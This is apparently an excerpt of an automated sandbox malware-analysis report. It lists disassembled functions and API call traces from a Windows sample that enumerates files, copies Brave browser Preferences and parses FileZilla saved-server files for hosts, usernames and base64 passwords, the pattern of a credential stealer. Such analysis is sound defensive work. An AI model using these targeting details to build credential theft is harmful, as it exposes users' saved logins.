                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC1BCF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1BF8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1C25
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC1C30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1C57
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC1C69
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1C8B
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC1C97
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1CC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1CEF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC1CFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1D21
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC1D33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1D55
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC1D61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1D8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1DB9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC1DC4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1DED
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC1E19
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1E36
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC1E42
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1E68
                                  • lstrlen.KERNEL32(01B9D538), ref: 00FC1E7E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1EB2
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC1EC6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1EE3
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC1EEF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1F15
                                  • lstrlen.KERNEL32(01B9D750), ref: 00FC1F2B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1F5F
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC1F73
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1F90
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC1F9C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1FC2
                                  • lstrlen.KERNEL32(01B8B748), ref: 00FC1FD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC2000
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC200B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC2036
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC2048
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC2067
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC2073
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC2098
                                  • lstrlen.KERNEL32(?), ref: 00FC20AC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC20D0
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FC20DE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC2103
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC213F
                                  • lstrlen.KERNEL32(01B9D580), ref: 00FC214E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC2176
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC2181
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                  • String ID: \*.*
                                  • API String ID: 712834838-1173974218
                                  • Opcode ID: ed0720c655c8e1ad640433a18fa9adf7fb2fe6871ebebafe4ee7cd3f5af6b3af
                                  • Instruction ID: 487d6cf5331449a2fbdf243cbfb6a17cd7204368a5ab28fe9e44f16a50369d6b
                                  • Opcode Fuzzy Hash: ed0720c655c8e1ad640433a18fa9adf7fb2fe6871ebebafe4ee7cd3f5af6b3af
                                  • Instruction Fuzzy Hash: B462A03091161B9BDB61EFA5CD8AFEEB7B9BF41710F040128B815A7245DB38DD41EBA0
                                  Function 00FC3910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00FC392C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00FC3943
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FC396C
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FC3986
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC39BF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC39E7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC39F2
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC39FD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3A1A
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC3A26
                                  • lstrlen.KERNEL32(?), ref: 00FC3A33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3A53
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FC3A61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3A8A
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC3ACE
                                  • lstrlen.KERNEL32(?), ref: 00FC3AD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3B05
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC3B10
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3B36
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC3B48
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3B6A
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC3B76
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3B9E
                                  • lstrlen.KERNEL32(?), ref: 00FC3BB2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3BD2
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FC3BE0
                                  • lstrlen.KERNEL32(01B991C8), ref: 00FC3C0B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3C31
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC3C3C
                                  • lstrlen.KERNEL32(01B99298), ref: 00FC3C5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3C84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC3C8F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3CB7
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC3CC9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3CE8
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC3CF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3D1A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC3D47
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC3D52
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3D79
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC3D8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3DAD
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC3DB9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3DE2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3E11
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC3E1C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3E43
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC3E55
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3E77
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC3E83
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3EAC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3EDB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC3EE6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3F0D
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC3F1F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3F41
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC3F4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3F75
                                  • lstrlen.KERNEL32(?), ref: 00FC3F89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3FA9
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FC3FB7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3FE0
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC401F
                                  • lstrlen.KERNEL32(01B9D580), ref: 00FC402E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4056
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC4061
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC408A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC40CE
                                  • lstrcat.KERNEL32(00000000), ref: 00FC40DB
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00FC42D9
                                  • FindClose.KERNEL32(00000000), ref: 00FC42E8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 1006159827-1013718255
                                  • Opcode ID: cd6701b092cd5e9b084d830e5002e7b72902f53212d2fde0d91d1ee9c32abfbe
                                  • Instruction ID: c456191dcf1393dd1840f7f93cc98e492eb57c752db9bf6ff1a8ca54cc2afab4
                                  • Opcode Fuzzy Hash: cd6701b092cd5e9b084d830e5002e7b72902f53212d2fde0d91d1ee9c32abfbe
                                  • Instruction Fuzzy Hash: E5629F31D1061B9BCB25EFA5CD4AFEE77B9AF40354F048128B815A7244DB38EE45EB90
                                  Function 00FC6960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC6995
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00FC69C8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6A29
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC6A34
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6A5D
                                  • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00FC6A77
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6A99
                                  • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00FC6AA5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6AD0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6B00
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00FC6B35
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC6B9D
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC6BCD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 313953988-555421843
                                  • Opcode ID: b877f8c00b110cd5ba22908b112ac1d0291fdb39512168ce7909002ab5362d06
                                  • Instruction ID: d5a723465c22168b06673eb18813b0b64432ad0175b5d7d49f7845dbef52d915
                                  • Opcode Fuzzy Hash: b877f8c00b110cd5ba22908b112ac1d0291fdb39512168ce7909002ab5362d06
                                  • Instruction Fuzzy Hash: 3C429130E04206ABDB25EBF1DD8AFAE7BB9AF44714F044428F515EB241DB38D941EB61
                                  Function 00FBDB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBDBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDBEF
                                  • lstrlen.KERNEL32(00FE4CA8), ref: 00FBDBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDC17
                                  • lstrcat.KERNEL32(00000000,00FE4CA8), ref: 00FBDC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDC4C
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBDC8F
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBDCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FBDCD0
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FBDCF0
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FBDD0A
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FBDD1D
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBDD47
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDD7B
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FBDD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDDA3
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBDDAF
                                  • lstrlen.KERNEL32(?), ref: 00FBDDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FBDDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDE19
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FBDE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBDE6F
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBDE7B
                                  • lstrlen.KERNEL32(01B99078), ref: 00FBDE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDEBB
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FBDEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBDEE6
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBDEF2
                                  • lstrlen.KERNEL32(01B991E8), ref: 00FBDF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDFA5
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBDFB1
                                  • lstrlen.KERNEL32(01B99078), ref: 00FBDFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDFF4
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FBDFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE022
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBE02E
                                  • lstrlen.KERNEL32(01B991E8), ref: 00FBE03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBE06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 00FBE0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 00FBE0E7
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBE11F
                                  • lstrlen.KERNEL32(01B9D580), ref: 00FBE12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE155
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FBE15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE19F
                                  • lstrcat.KERNEL32(00000000), ref: 00FBE1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00FBE1F9
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBE22F
                                  • lstrlen.KERNEL32(01B991C8), ref: 00FBE23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE261
                                  • lstrcat.KERNEL32(00000000,01B991C8), ref: 00FBE269
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00FBE988
                                  • FindClose.KERNEL32(00000000), ref: 00FBE997
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                  • String ID: Brave$Preferences$\Brave\Preferences
                                  • API String ID: 1346089424-1230934161
                                  • Opcode ID: 8208f02ead67d8ae059883fe32f0141c0efd1269a6b7fe053284925fc20f9d2f
                                  • Instruction ID: dbbb7b859cf4ec6e3048d107d29178ecccd7d6a78165c9d24c3c47dd6ce7053e
                                  • Opcode Fuzzy Hash: 8208f02ead67d8ae059883fe32f0141c0efd1269a6b7fe053284925fc20f9d2f
                                  • Instruction Fuzzy Hash: 9F527170D1120A9BDB65EFA6DC89AEE7BF9AF44314F044028F815AB245DB38DC41EF91
                                  Function 00FB60D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB60FF
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB6152
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB6185
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB61B5
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB61F0
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB6223
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FB6233
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: c689d5112fd7a47aa22787a9f564c66ff3d2af037f8af03313092ef6a27f6c58
                                  • Instruction ID: 3b1c29054fa3d1bf28b2bf81897f3b82204e745cb19b9e55efd43749e62583bf
                                  • Opcode Fuzzy Hash: c689d5112fd7a47aa22787a9f564c66ff3d2af037f8af03313092ef6a27f6c58
                                  • Instruction Fuzzy Hash: 8B525D71D1021A9BDB21EFA5DC49AEEB7B9AF44710F194028F815EB245DB38EC41EF90
                                  Function 00FC6B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC6B9D
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC6BCD
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC6BFD
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC6C2F
